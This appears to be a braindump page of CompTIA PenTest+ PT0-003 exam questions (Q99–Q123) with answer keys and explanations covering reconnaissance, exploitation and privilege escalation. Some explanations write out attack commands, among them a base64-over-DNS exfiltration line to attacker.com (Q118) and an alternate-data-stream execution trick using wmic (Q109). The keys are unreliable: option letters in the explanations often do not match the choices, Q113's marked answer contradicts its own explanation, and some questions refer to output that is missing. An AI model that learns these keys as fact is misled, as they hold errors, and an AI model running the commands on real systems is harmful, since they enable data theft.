[Jun-2026] Pass CompTIA PT0-003 Tests Engine pdf - All Free Dumps
CompTIA PenTest+ Exam Practice Tests 2026 | Pass PT0-003 with confidence!
CompTIA PT0-003 Exam Syllabus Topics:
| Topic | Details |
|---|---|
| Topic 1 |
|
| Topic 2 |
|
| Topic 3 |
|
| Topic 4 |
|
| Topic 5 |
|
NEW QUESTION # 99
As part of active reconnaissance, penetration testers need to determine whether a protection mechanism is in place to safeguard the target's website against web application attacks. Which of the following methods would be the most suitable?
- A. Scapy packet crafting
- B. Direct-to-origin testing
- C. Antivirus scanning
- D. WAF detection
Answer: D
Explanation:
Detecting a Web Application Firewall (WAF) helps penetration testers understand the protective measures in place and tailor their testing methods to bypass these defenses.
NEW QUESTION # 100
A penetration tester completes a scan and sees the following Nmap output on a host:
Nmap scan report for victim (10.10.10.10)
Host is up (0.0001s latency)
PORT STATE SERVICE
161/udp open snmp
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Running Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7::sp0
The tester wants to obtain shell access. Which of the following related exploits should the tester try first?
- A. exploit/windows/smb/ms17_010_eternalblue
- B. exploit/windows/smb/psexec
- C. auxiliary/scanner/snmp/snmp_login
- D. exploit/windows/smb/ms08_067_netapi
Answer: A
Explanation:
Since the system is running Windows 7 SP0, it is highly likely to be vulnerable to MS17-010 (EternalBlue), a critical SMB vulnerability used for remote code execution (RCE).
Option A (psexec) ❌: PsExec requires valid credentials, which we do not have yet.
Option B (ms08_067_netapi) ❌: MS08-067 targets Windows XP/Server 2003, but the system is Windows 7.
Option C (ms17_010_eternalblue) ✅: Correct.
EternalBlue allows remote exploitation of SMBv1 in Windows 7/Server 2008.
Option D (snmp_login scanner) ❌: Only checks default SNMP credentials, not an exploit.
Reference: CompTIA PenTest+ PT0-003 Official Guide - SMB Exploitation & EternalBlue
NEW QUESTION # 101
During a penetration testing exercise, a team decides to use a watering hole strategy. Which of the following is the most effective approach for executing this attack?
- A. Create fake social media profiles to befriend employees.
- B. Send phishing emails to the organization's employees.
- C. Compromise a website frequently visited by the organization's employees.
- D. Launch a DDoS attack on the organization's website.
Answer: C
Explanation:
Watering Hole Attack Explanation:
A watering hole attack involves compromising a website that the target frequently visits.
The attacker injects malicious code into the site, which then exploits users who access it.
Why Not Other Options?
B: DDoS attacks disrupt services but do not align with the watering hole strategy.
C: Social engineering may be effective but is not a watering hole attack.
D: Phishing is unrelated to compromising trusted websites.
CompTIA Pentest+ Reference:
Domain 3.0 (Attacks and Exploits)
NEW QUESTION # 102
Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?
- A. DirBuster
- B. CeWL
- C. Open VAS
- D. Scout Suite
Answer: A
Explanation:
DirBuster is a tool that can brute-force directories and filenames on web servers. It can help a penetration tester locate a file that was uploaded to a content management system by trying different combinations of paths and names until it finds a match. DirBuster can also use wordlists to speed up the process and discover hidden files or directories. References: The Official CompTIA PenTest+ Instructor Guide (Exam PT0-002) eBook, page 156
NEW QUESTION # 103
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:
Which of the following would be the BEST command to use for further progress into the targeted network?
- A. ssh 127.0.0.1 5555
- B. ssh 10.10.1.2
- C. nc 127.0.0.1 5555
- D. nc 10.10.1.2
Answer: C
NEW QUESTION # 104
During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?
- A. theHarvester
- B. Censys.io
- C. WHOIS
- D. WiGLE.net
Answer: B
Explanation:
Censys.io is a powerful reconnaissance tool that scans the internet and provides detailed information about exposed services, certificates, and GeoIP data.
Option A (WiGLE.net) ❌: Used for wireless network mapping, not host discovery.
Option B (WHOIS) ❌: Provides domain registration information, not GeoIP or service summaries.
Option C (theHarvester) ❌: Used for OSINT, mainly to collect emails, subdomains, and usernames.
Option D (Censys.io) ✅: Correct. Censys provides:
GeoIP data (location of hosts).
Exposed services and open ports.
TLS certificate analysis.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Reconnaissance and OSINT Tools
NEW QUESTION # 105
A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.
Which of the following commands should the engineer use to achieve the objective in the least amount of time?
- A. nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100
- B. nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80
- C. nmap -TO -p 80 10.0.0.0/16
- D. nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60
Answer: D
Explanation:
The nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60 command is used to scan the 10.0.0.0/16 subnet for web servers (port 80) at a maximum rate of 60 packets per minute. The -T4 option sets the timing template to
"aggressive", which speeds up the scan. The --max-rate option limits the number of packets sent per second, helping to bypass the network IPS that isolates the source when the scan exceeds 100 packets per minute12.
References: Nmap commands
NEW QUESTION # 106
A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?
- A. Browser Exploitation Framework
- B. theHarvester
- C. Metasploit
- D. Maltego
Answer: A
Explanation:
Cross-Site Request Forgery (CSRF) vulnerabilities can be leveraged to trick authenticated users into performing unwanted actions on a web application. The right tool for this task would help in exploiting web- based vulnerabilities, particularly those related to web browsers and interactions.
Browser Exploitation Framework (BeEF):
BeEF is a powerful tool specifically designed for exploiting web browser vulnerabilities. It can hook web browsers and perform a wide range of attacks, including CSRF.
Capabilities: BeEF is equipped with modules to create CSRF attacks, capture session tokens, and gather sensitive information from the target user's browser session.
References: BeEF is widely used in penetration testing for its extensive capabilities in exploiting web application vulnerabilities and manipulating browser sessions.
Maltego (Option B):
Explanation: Maltego is an open-source intelligence (OSINT) tool used for information gathering and visualizing relationships between data.
Drawbacks: While useful for reconnaissance, Maltego is not designed for exploiting web vulnerabilities like CSRF.
Metasploit (Option C):
Explanation: Metasploit is a versatile exploitation framework that can be used for various types of penetration testing tasks, including web application exploitation.
Capabilities: While Metasploit can exploit some web vulnerabilities, it is not specifically tailored for CSRF attacks as effectively as BeEF.
References: Metasploit's strength lies in its comprehensive exploitation modules, but for specific browser- based attacks, BeEF is more focused and effective.
theHarvester (Option D):
Explanation: theHarvester is a tool for gathering open-source intelligence (OSINT) about a target, primarily used for reconnaissance.
Drawbacks: It does not provide capabilities for exploiting CSRF vulnerabilities.
Conclusion: The Browser Exploitation Framework (BeEF) is the most suitable tool for leveraging a CSRF vulnerability to gather sensitive details from an application's end users. It is specifically designed for browser- based exploitation, making it the best choice for this task.
NEW QUESTION # 107
A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following:
SeAssignPrimaryTokenPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeManageVolumePrivilege Enabled
SeImpersonatePrivilege Enabled
SeCreateGlobalPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
Which of the following privileges should the tester use to achieve the goal?
- A. SeImpersonatePrivilege
- B. SeCreateGlobalPrivilege
- C. SeChangeNotifyPrivilege
- D. SeManageVolumePrivilege
Answer: A
Explanation:
The SeImpersonatePrivilege allows a process to impersonate another user's security context, which is commonly used in token manipulation attacks for privilege escalation.
Option A (SeImpersonatePrivilege) ✅: Correct.
Used in Juicy Potato or Rogue Potato attacks to escalate privileges.
Option B (SeCreateGlobalPrivilege) ❌: Allows creating global objects, but not privilege escalation.
Option C (SeChangeNotifyPrivilege) ❌: Enables traverse directory access, not privilege escalation.
Option D (SeManageVolumePrivilege) ❌: Used for disk management, not privilege escalation.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Windows Privilege Escalation via Token Impersonation
NEW QUESTION # 108
Which of the following describes an attack where authentication tokens are captured and reused to impersonate users in a system using OpenID Connect (OIDC) with OAuth?
- A. A brute-force attack against the authentication system
- B. A password-spraying attack against the authentication system
- C. A mask attack against the authentication system
- D. A replay attack against the authentication flow in the system
Answer: D
Explanation:
OpenID Connect (OIDC) with OAuth allows applications to authenticate users using third-party identity providers (IdPs). If dynamic registration is enabled, attackers can abuse this feature to capture and replay authentication requests.
* Replay attack (Option C):
* Attackers capture legitimate authentication tokens and reuse them to impersonate users.
* OIDC uses JWTs (JSON Web Tokens), which may not expire quickly, making replay attacks highly effective.
NEW QUESTION # 109
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
- A. Alternate data streams
- B. PowerShell modules
- C. MP4 steganography
- D. PsExec
Answer: A
Explanation:
Alternate data streams (ADS) are a feature of the NTFS file system that allows storing additional data in a file without affecting its size, name, or functionality. ADS can be used to hide or embed data or executable code in a file, such as a specially crafted binary for later execution. ADS can be created or accessed using various tools or commands, such as the command prompt, PowerShell, or Sysinternals12. For example, the following command can create an ADS named secret.exe in a file named test.txt and run it using wmic.exe process call create function: type secret.exe > test.txt:secret.exe & wmic process call create "cmd.exe /c test.txt:secret.exe"
NEW QUESTION # 110
During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.
The tester's main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.
Which of the following steps should the tester take to complete the goal?
- A. Use Metasploit to create and execute a payload and try to upload the payload into other systems
- B. Use Mimikatz to collect information about the accounts and try to authenticate in other systems
- C. Use Evil-WinRM to access other systems in the network within the endpoint credentials
- D. Use Hashcat to crack a password for the local user on the compromised endpoint
Answer: B
Explanation:
Since the tester has compromised a Windows machine and bypassed security, the best next step is to extract credentials from memory to move laterally within Active Directory.
Option A (Mimikatz) ✅: Correct.
Mimikatz extracts hashed credentials, plaintext passwords, and Kerberos tickets from memory.
Attackers use Pass-the-Hash (PtH) or Pass-the-Ticket (PtT) to authenticate on other systems without cracking passwords.
Option B (Hashcat) ❌: Cracking passwords takes time and is not necessary if Mimikatz provides reusable credentials.
Option C (Evil-WinRM) ❌: Evil-WinRM is useful for remotely executing commands, but without valid credentials, it won't work.
Option D (Metasploit) ❌: Metasploit payloads may be useful for initial exploitation, but credential dumping is a better next step.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Credential Dumping & Lateral Movement
NEW QUESTION # 111
Which of the following authorizations is mandatory when a penetration tester is involved in a complex IT infrastructure?
- A. Third-party authorization
- B. Internal team authorization
- C. Customer authorization
- D. Penetration tester authorization
Answer: C
Explanation:
Comprehensive and Detailed Explanation:
Before any penetration testing begins - especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms - a formal written authorization from the customer (client organization) is mandatory.
This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., Computer Fraud and Abuse Act in the U.S.) and corporate policies.
Why not the others:
* B. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.
* C. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it's not mandatory.
* D. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.
CompTIA PT0-003 Objective Mapping:
* Domain 1.0: Planning and Scoping
* 1.2: Explain legal concepts, authorization requirements, and rules of engagement prior to testing.
NEW QUESTION # 112
A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?
- A. Shoulder surfing
- B. Recon-ng
- C. Password dumps
- D. Social media
Answer: D
Explanation:
When developing a phishing campaign, the tester should first use social media to gather information about the targets.
* Social Media:
* Purpose: Social media platforms like LinkedIn, Facebook, and Twitter provide valuable information about individuals, including their job roles, contact details, interests, and connections.
* Reconnaissance: This information helps craft convincing and targeted phishing emails, increasing the likelihood of success.
* Process:
* Gathering Information: Collect details about the target employees, such as their names, job titles, email addresses, and any personal information that can make the phishing email more credible.
* Crafting Phishing Emails: Use the gathered information to personalize phishing emails, making them appear legitimate and relevant to the recipients.
* Other Options:
* Shoulder Surfing: Observing someone's screen or keyboard input to gain information, not suitable for gathering broad information for a phishing campaign.
* Recon-ng: A tool for automated reconnaissance, useful but more general. Social media is specifically targeted for gathering personal information.
* Password Dumps: Using previously leaked passwords to find potential targets is more invasive and less relevant to the initial stage of developing a phishing campaign.
Pentest References:
* Spear Phishing: A targeted phishing attack aimed at specific individuals, using personal information to increase the credibility of the email.
* OSINT (Open Source Intelligence): Leveraging publicly available information to gather intelligence on targets, including through social media.
By starting with social media, the penetration tester can collect detailed and personalized information about the targets, which is essential for creating an effective spear phishing campaign.
NEW QUESTION # 113
A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following output:
mathematica
Copy code
SeAssignPrimaryTokenPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeManageVolumePrivilege Enabled
SeImpersonatePrivilege Enabled
SeCreateGlobalPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
Which of the following privileges should the tester use to achieve the goal?
- A. SeImpersonatePrivilege
- B. SeChangeNotifyPrivilege
- C. SeCreateGlobalPrivilege
- D. SeManageVolumePrivilege
Answer: C
Explanation:
ImpersonatePrivilege for Escalation:
The SeImpersonatePrivilege allows a process to impersonate a user after authentication. This is a common privilege used in token stealing or pass-the-token attacks to escalate privileges.
Exploits like Rotten Potato and Juicy Potato specifically target this privilege to elevate access to SYSTEM.
Why Not Other Options?
B (SeCreateGlobalPrivilege): This allows processes to create global objects but does not directly enable privilege escalation.
C (SeChangeNotifyPrivilege): This is related to bypassing traverse checking and does not facilitate privilege escalation.
D (SeManageVolumePrivilege): This allows volume maintenance but is not relevant for privilege escalation.
CompTIA Pentest+ References:
Domain 3.0 (Attacks and Exploits)
NEW QUESTION # 114
A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:
nmap 10.10.1.0/24
Which of the following is the number of TCP ports that will be scanned?
- A. 65,535
- B. 0
- C. 1,000
- D. 1,024
Answer: C
Explanation:
By default, Nmap scans the top 1,000 most commonly used TCP ports unless otherwise specified.
* Option A (256) #: Incorrect. This refers to the number of hosts in a /24 subnet, not the number of ports scanned.
* Option B (1,000) #: Correct. Nmap defaults to scanning the 1,000 most common TCP ports unless the - p flag is used to specify a different range.
* Option C (1,024) #: Incorrect. The first 1,024 ports are well-known ports, but Nmap scans 1,000 by default, not 1,024.
* Option D (65,535) #: Incorrect. Nmap only scans all ports if the -p- flag is used (e.g., nmap -p-
<target>).
# Reference: CompTIA PenTest+ PT0-003 Official Guide - Network Scanning with Nmap
NEW QUESTION # 115
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
- A. SLA
- B. MSA
- C. NDA
- D. ROE
Answer: C
NEW QUESTION # 116
During a security assessment, a penetration tester captures plaintext login credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access.
Which of the following tools is the tester using?
- A. Metasploit
- B. Wireshark
- C. Zed Attack Proxy (ZAP)
- D. Burp Suite
Answer: B
Explanation:
Capturing plaintext credentials in network traffic is done using packet sniffing. Wireshark is the best tool for this task.
* Option A (Burp Suite) #: Used for web application testing and intercepting HTTPS traffic, but not general network sniffing.
* Option B (Wireshark) #: Correct.
* Wireshark is a packet analysis tool that captures unencrypted network traffic, including plaintext credentials.
* Option C (ZAP - Zed Attack Proxy) #: Similar to Burp Suite, but focused on web application security, not network packet capture.
* Option D (Metasploit) #: Metasploit is used for exploitation rather than capturing traffic.
# Reference: CompTIA PenTest+ PT0-003 Official Guide - Packet Sniffing & Network Traffic Analysis
NEW QUESTION # 117
A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?
- A. Packet injection
- B. Bluejacking
- C. Beacon flooding
- D. Signal jamming
Answer: A
Explanation:
If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.
* Packet injection (Option A):
* Attackers forge and transmit fake packets to manipulate network behavior.
* Common in WEP/WPA attacks to force IV collisions or spoof DHCP responses.
NEW QUESTION # 118
A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?
- A. Padding the data and uploading the files through an external cloud storage service.
- B. Hashing the data and emailing the files to the tester's company inbox.
- C. Encoding the data and pushing through DNS to the tester's controlled server.
- D. Obfuscating the data and pushing through FTP to the tester's controlled server.
Answer: C
Explanation:
DLP (Data Loss Prevention) systems monitor and block sensitive data transfers over HTTP, FTP, Email, and removable devices.
Encoding the data and exfiltrating through DNS (Option A):
DNS is often overlooked by DLP systems because it is required for network functionality.
Attackers use DNS tunneling (e.g., dnscat2, IODINE) to exfiltrate data inside DNS queries.
Example method
echo "Sensitive Data" | base64 | nslookup -q=TXT attacker.com
Reference:
Incorrect options:
Option B (Cloud storage): Many organizations monitor file uploads to cloud storage.
Option C (FTP): FTP is easily monitored and flagged by DLP solutions.
Option D (Hashing and emailing): Emails are actively scanned by DLP policies.
NEW QUESTION # 119
User credentials were captured from a database during an assessment and cracked using rainbow tables.
Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?
- A. bcrypt
- B. PBKDF2
- C. SHA-1
- D. MD5
Answer: D
Explanation:
Reference: https://www.geeksforgeeks.org/understanding-rainbow-table-attack/
NEW QUESTION # 120
A penetration tester gives the following command to a systems administrator to execute on one of the target servers:
rm -f /var/www/html/G679h32gYu.php
Which of the following BEST explains why the penetration tester wants this command executed?
- A. To remove a web shell after the penetration test
- B. To trick the systems administrator into installing a rootkit
- C. To close down a reverse shell
- D. To delete credentials the tester created
Answer: A
Explanation:
A web shell is a malicious script that allows remote access and control of a web server. A penetration tester may use a web shell to execute commands on the target server during a penetration test. However, after the test is completed, the penetration tester should remove the web shell to avoid leaving any traces or backdoors on the server. The command rm -f /var/www/html/G679h32gYu.php deletes the file G679h32gYu.php from the web server's document root directory, which is likely the location of the web shell. The other options are not plausible explanations for why the penetration tester wants this command executed.
NEW QUESTION # 121
A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:
nmap 10.10.1.0/24
Which of the following is the number of TCP ports that will be scanned?
- A. 65,535
- B. 0
- C. 1,000
- D. 1,024
Answer: C
Explanation:
By default, Nmap scans the top 1,000 most commonly used TCP ports unless otherwise specified.
Option A (256) ❌: Incorrect. This refers to the number of hosts in a /24 subnet, not the number of ports scanned.
Option B (1,000) ✅: Correct. Nmap defaults to scanning the 1,000 most common TCP ports unless the -p flag is used to specify a different range.
Option C (1,024) ❌: Incorrect. The first 1,024 ports are well-known ports, but Nmap scans 1,000 by default, not 1,024.
Option D (65,535) ❌: Incorrect. Nmap only scans all ports if the -p- flag is used (e.g., nmap -p- <target>).
Reference: CompTIA PenTest+ PT0-003 Official Guide - Network Scanning with Nmap
NEW QUESTION # 122
The following file was obtained during reconnaissance:
Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?
- A. Exposure of other users' sensitive data
- B. Hijacking the default user login shells
- C. Corrupting the skeleton configuration file
- D. Unauthorized access to execute binaries via sudo
Answer: A
Explanation:
DIR_MODE=0777 configures new home directories to be created world-readable, world-writable, and world-executable (rwxrwxrwx). With such permissive permissions, any unprivileged local user can traverse into other users' home directories, list files, read them, and even modify or replace them. That makes exposure of other users' sensitive data the most likely and immediate outcome once the tester has any local user account.
Why the other options are less likely:
B . Unauthorized sudo execution: Requires membership in sudo/wheel or explicit entries in /etc/sudoers. Nothing in the snippet indicates that, and file mode on home dirs doesn't grant sudo.
C . Hijacking default login shells: DSHELL=/bin/zsh only sets the default shell for new users. Replacing /bin/zsh or altering /etc/passwd would require root.
D . Corrupting the skeleton configuration: SKEL=/etc/systemd-conf/temp-skeleton is under /etc/..., which is root-owned on standard systems. A normal user cannot write there, so "corrupting the skeleton" is unlikely without privilege escalation.
Practical exploitation as a non-privileged user (illustrative):
# Find world-writable homes
find /home -maxdepth 1 -type d -perm -0002 -ls
# Read another user's files
cd /home/targetuser && ls -la && cat Documents/tax_return.pdf
(Depending on per-file permissions.)
CompTIA PenTest+ PT0-003 Objective Mapping (for study):
Domain 3.0 Attacks and Exploits
NEW QUESTION # 123
......
Online Exam Practice Tests with detailed explanations!: https://quizguide.actualcollection.com/PT0-003-exam-questions.html